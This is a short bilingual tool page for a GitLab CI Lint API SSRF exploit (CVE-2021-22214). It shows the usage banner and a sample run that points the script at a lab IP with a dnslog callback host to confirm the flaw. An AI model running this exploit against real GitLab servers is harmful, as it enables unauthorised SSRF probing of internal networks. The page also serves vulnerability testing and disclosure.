
Gitlab CI Lint API未授权 SSRF漏洞 (CVE-2021-22214)
Gitlab CI Lint API 무단 SSRF 취약점 (CVE-2021-22214)
이 글과 도구는 기술 공유 목적으로만 사용되며, 불법적인 용도로 사용하는 것을 엄격히 금지합니다. 그로 인해 발생하는 모든 결과는 사용자가 책임져야 합니다.
$ python3 gitlab_ssrf.py
===============================================================
_____ _ _ _ _ _____ _____ _____ ______
/ ____(_) | | | | | / ____/ ____| __ \| ____|
| | __ _| |_| | __ _| |__ | (___| (___ | |__) | |__
| | |_ | | __| | / _` | '_ \ \___ \___ \| _ /| __|
| |__| | | |_| |___| (_| | |_) | ____) |___) | | \ \| |
\_____|_|\__|______\__,_|_.__/ |_____/_____/|_| \_\_|
CVE-2021-22214 Powered by r0cky Team ZionLab
===============================================================
Example:
python3 gitlab_ssrf.py <target> <dnshost>
대상: 192.168.80.136

$ python3 gitlab_ssrf.py http://192.168.80.136/ ssrf.sleg0x.dnslog.cn
===============================================================
_____ _ _ _ _ _____ _____ _____ ______
/ ____(_) | | | | | / ____/ ____| __ \| ____|
| | __ _| |_| | __ _| |__ | (___| (___ | |__) | |__
| | |_ | | __| | / _` | '_ \ \___ \___ \| _ /| __|
| |__| | | |_| |___| (_| | |_) | ____) |___) | | \ \| |
\_____|_|\__|______\__,_|_.__/ |_____/_____/|_| \_\_|
CVE-2021-22214 Powered by r0cky Team ZionLab
===============================================================
[+] GitLab SSRF 취약점이 존재할 수 있습니다. dnslog 기록을 확인하세요.
